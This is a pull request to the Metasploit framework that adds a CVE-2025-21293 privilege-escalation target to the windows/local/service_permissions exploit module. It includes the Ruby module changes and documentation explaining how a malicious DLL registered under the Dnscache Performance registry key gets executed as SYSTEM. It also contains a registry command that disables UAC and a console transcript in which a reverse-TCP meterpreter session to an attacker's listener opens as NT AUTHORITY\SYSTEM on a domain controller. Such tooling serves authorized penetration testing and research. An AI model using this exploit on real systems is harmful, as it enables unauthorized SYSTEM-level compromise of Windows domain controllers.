### PR TITLE
Updated service_permissions with action to exploit CVE-2025-21293

### DIFF
--- a/documentation/modules/exploit/windows/local/service_permissions.md
+++ b/documentation/modules/exploit/windows/local/service_permissions.md
@@ -58,6 +58,27 @@ The name of a specific service to target. This can be used to avoid targeting al
 the module user wants to target a specific one. When specified, the service name is compared to others in a
 case-insensitive manner per the [`CreateServiceA`][CreateServiceA] documentation.
 
+## Actions
+
+### Exploit CVE-2025-21293
+Prior to the January 2025 Windows update, users who are apart of the `Network Configuration Operators` group have the
+`CreateSubKey` Registry Right under the `HKLM\System\CurrentControlSet\Services\Dnscache\` registry key (which is the
+crux of CVE-2025-21293). This allows them to exploit the Weak Registry Permissions technique included in this module
+to gain SYSTEM privileges.
+
+However there are a few caveats to this. As mentioned in the original [research paper](https://birkep.github.io/posts/Windows-LPE/)
+there is a chance that the session will be established in the context of `nt authority\local service` and not `nt authority\system`.
+If this happens, rerun the module.
+
+Also if UAC is enabled, despite having `CreateSubKey` RegistryRight under the:q
+`HKLM\System\CurrentControlSet\Services\Dnscache\` registry key, Windows will not let you create the registry key as a
+non-admin user. In order to exploit CVE-2025-21293, remotely and from Metasploit, you need to disable UAC. This can be
+done by running the following command in an elevated command prompt and then rebooting the system:
+
+```
+reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
+```
+
 ## Scenarios
 Specific demo of using the module that might be useful in a real world scenario.
 
@@ -156,3 +177,65 @@ meterpreter >
 ```
 
 [CreateServiceA]: https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-createservicea
+
+### Scenario: Windows Server 2019. Action: CVE-2025-21293
+
+```
+msf6 exploit(windows/local/service_permissions) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(windows/local/service_permissions) > set lport 6665
+lport => 6665
+msf6 exploit(windows/local/service_permissions) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/local/service_permissions) > set target 1
+target => 1
+msf6 exploit(windows/local/service_permissions) > options
+
+Module options (exploit/windows/local/service_permissions):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   AGGRESSIVE  false            no        Exploit as many services as possible (dangerous)
+   SESSION     -1               yes       The session to run this module on
+   TIMEOUT     10               yes       Timeout for WMI command in seconds
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT     6665             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Exploit CVE-2025-21293
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/local/service_permissions) > run
+[*] Started reverse TCP handler on 172.16.199.1:6665
+[*] exploiting Exploit CVE-2025-21293
+[+] [Dnscache] Created registry key: HKLM\System\CurrentControlSet\Services\Dnscache\Performance
+[*] Sending stage (203846 bytes) to 172.16.199.200
+[+] Deleted C:\Users\msfuser\AppData\Local\Temp\VcsHZcFQ.dll
+[*] Meterpreter session 8 opened (172.16.199.1:6665 -> 172.16.199.200:49807) at 2025-04-16 09:42:35 -0700
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DC2
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : KERBEROS
+Logged On Users : 5
+Meterpreter     : x64/windows
+meterpreter >
+```

--- a/documentation/modules/exploit/windows/local/service_permissions.md
+++ b/documentation/modules/exploit/windows/local/service_permissions.md
@@ -70,7 +70,7 @@ However there are a few caveats to this. As mentioned in the original [research 
 there is a chance that the session will be established in the context of `nt authority\local service` and not `nt authority\system`.
 If this happens, rerun the module.
 
-Also if UAC is enabled, despite having `CreateSubKey` RegistryRight under the:q
+Also if UAC is enabled, despite having `CreateSubKey` RegistryRight under the
 `HKLM\System\CurrentControlSet\Services\Dnscache\` registry key, Windows will not let you create the registry key as a
 non-admin user. In order to exploit CVE-2025-21293, remotely and from Metasploit, you need to disable UAC. This can be
 done by running the following command in an elevated command prompt and then rebooting the system:

--- a/modules/exploits/windows/local/service_permissions.rb
+++ b/modules/exploits/windows/local/service_permissions.rb
@@ -266,7 +266,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     if sysinfo['Architecture'] != payload_arch
-      print_error('The registry technique will be skipped because the payload architecture does not match the native system architecture')
+      print_error('The registry technique will be skipped because the payload architecture selected does not match the payload architecture of the session being used in the exploit.')
     end
     tempexe_name = "#{Rex::Text.rand_text_alpha(rand(6..13))}.exe"
 
@@ -276,7 +276,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     if target.name == 'Exploit CVE-2025-21293'
       print_status('Exploiting CVE-2025-21293')
-      fail_with(Failure::BadConfig, 'To exploit CVE-2025-21293 remotely UAC must be disabled') unless is_uac_enabled?
+      fail_with(Failure::BadConfig, 'To exploit CVE-2025-21293 through a remote shell UAC must be disabled') if is_uac_enabled?
       weak_registry_permissions('Dnscache')
       return
     end

--- a/modules/exploits/windows/local/service_permissions.rb
+++ b/modules/exploits/windows/local/service_permissions.rb
@@ -276,6 +276,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     if target.name == 'Exploit CVE-2025-21293'
       print_status('Exploiting CVE-2025-21293')
+      fail_with(Failure::BadConfig, 'To exploit CVE-2025-21293 remotely UAC must be disabled') unless is_uac_enabled?
       weak_registry_permissions('Dnscache')
       return
     end

--- a/modules/exploits/windows/local/service_permissions.rb
+++ b/modules/exploits/windows/local/service_permissions.rb
@@ -38,20 +38,26 @@ class MetasploitModule < Msf::Exploit::Local
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],
-        'DefaultOptions' =>
-          {
-            'EXITFUNC' => 'thread',
-            'WfsDelay' => '5'
-          },
-        'Targets' =>
-          [
-            [ 'Automatic', {} ],
-          ],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread',
+          'WfsDelay' => '5'
+        },
+        'Targets' => [
+          [ 'Automatic', {} ],
+          [ 'Exploit CVE-2025-21293', {} ]
+        ],
         'References' => [
-          ['URL', 'https://itm4n.github.io/windows-registry-rpceptmapper-eop/']
+          ['URL', 'https://itm4n.github.io/windows-registry-rpceptmapper-eop/'],
+          ['URL', 'https://birkep.github.io/posts/Windows-LPE/'],
+          ['CVE', '2025-21293'],
         ],
         'DefaultTarget' => 0,
-        'DisclosureDate' => '2012-10-15'
+        'DisclosureDate' => '2012-10-15',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        },
       )
     )
 
@@ -68,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Local
     success = false
 
     print_status('Trying to add a new service...')
-    service_name = Rex::Text.rand_text_alpha((rand(6..13)))
+    service_name = Rex::Text.rand_text_alpha(rand(6..13))
     if service_create(service_name, { path: path, display: '' }) == ERROR::SUCCESS
       print_status("Created service... #{service_name}")
       write_exe(path, service_name)
@@ -95,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Local
       print_status("[#{service_name}] Restarting service")
       res = service_stop(service_name)
 
-      if ((res == ERROR::SUCCESS) || (res == ERROR::SERVICE_NOT_ACTIVE))
+      if (res == ERROR::SUCCESS) || (res == ERROR::SERVICE_NOT_ACTIVE)
         write_exe(path, service_name)
         if service_restart(service_name)
           print_good("[#{service_name}] Service restarted")
@@ -144,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Local
           stopped = true
         else
           res = service_stop(service_name)
-          stopped = ((res == ERROR::SUCCESS) || (res == ERROR::SERVICE_NOT_ACTIVE))
+          stopped = (res == ERROR::SUCCESS) || (res == ERROR::SERVICE_NOT_ACTIVE)
         end
       rescue RuntimeError => e
         vprint_error("[#{service_name}] #{e} ")
@@ -156,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Local
           if move_file(possible_path, "#{possible_path}.bak")
             write_exe(possible_path, service_name)
             print_status("[#{service_name}] #{possible_path} moved to #{possible_path}.bak and replaced.")
-            if service_restart(service_name) # rubocop:disable Metrics/BlockNesting
+            if service_restart(service_name)
               print_good("[#{service_name}] Service restarted")
               success = true
             else
@@ -268,6 +274,12 @@ class MetasploitModule < Msf::Exploit::Local
     tmpdir = dir_env['TEMP']
     tempexe = "#{tmpdir}\\#{tempexe_name}"
 
+    if target.name == 'Exploit CVE-2025-21293'
+      print_status('Exploiting CVE-2025-21293')
+      weak_registry_permissions('Dnscache')
+      return
+    end
+
     if datastore['TargetServiceName'].blank?
       begin
         return if execute_payload_as_new_service(tempexe)
@@ -283,7 +295,7 @@ class MetasploitModule < Msf::Exploit::Local
     token = get_imperstoken
     each_service do |serv|
       service_name = serv[:name]
-      next unless (datastore['TargetServiceName'].blank? || datastore['TargetServiceName'].downcase == service_name.downcase)
+      next unless datastore['TargetServiceName'].blank? || datastore['TargetServiceName'].downcase == service_name.downcase
 
       service = service_info(service_name)
 


### PR DESCRIPTION
This is a Windows LPE which abuses the privileges of the `Network Configuration Operators` group prior to the January 2025 Windows update. Before this update users in the group had the `CreateSubKey` RegistryRight under the `HKLM\System\CurrentControlSet\Services\Dnscache\` registry key, which allowed them to weaponize Performance Counters to gain SYSTEM level access to the system.  Basically you add the `Perfomance` key under `Dnscache`, then you add a path to a malicious DLL under the `Library` key under the `Performance` key (among a couple others) and when you make a specific call to WMI, the DLL gets executed with SYSTEM privs.

As I was writing a unique module to exploit CVE-2025-21293 I realized we already had a module which exploited this fairly generic vulnerability type `windows/local/service_permissions.rb`  and figured it would make more sense to add this CVE as an action to this preexisting module. 

# Note for testers
 - This needs to be tested on a domain controller as the vulnerable group `Network Configuration Operators` is unique to domain controllers. 
 - You need to disable UAC in order to exploit this vulnerability remotely:
```
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
```

 - You need to create a regular user and add them to the `Network Configuration Operators` group. 
 - Ensure that they're not in the Administrators group 
   - When I removed my user from the Admins group it wouldn't allow me to log on locally anymore (which is the way I like to gain the initial shell as that user). To ensure your user can still authenticate locally change the Group Policy of the  `Network Configuration Operators` group to allow local logon.

- First launch `gpmc.msc`, then navigate as follows:
```
Group Policy Management
└── Forest: YourDomain
    └── Domains
        └── YourDomainName
            └── Domain Controllers
                └── Default Domain Controllers Policy
```
- Right click and select edit on `Default Domain Controllers Policy`

Again navigate:
```
Computer Configuration
└── Windows Settings
    └── Security Settings
        └── Local Policies
            └── User Rights Assignment
                └── Allow log on locally
```
- And then add the `Network Configuration Operators` group to the list of Groups allowed to log on locally. 

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] get an initial session with a non-admin user in the `Network Configuration Operators` group 
- [ ] do `use windows/local/service_permissions`
- [ ] do `set target 1`
- [ ] Set the `LHOST` `LPORT` and `payload` 
- [ ] do `run`
- [ ] Get a session running in the context of `NT AUTHORITY\SYSTEM`

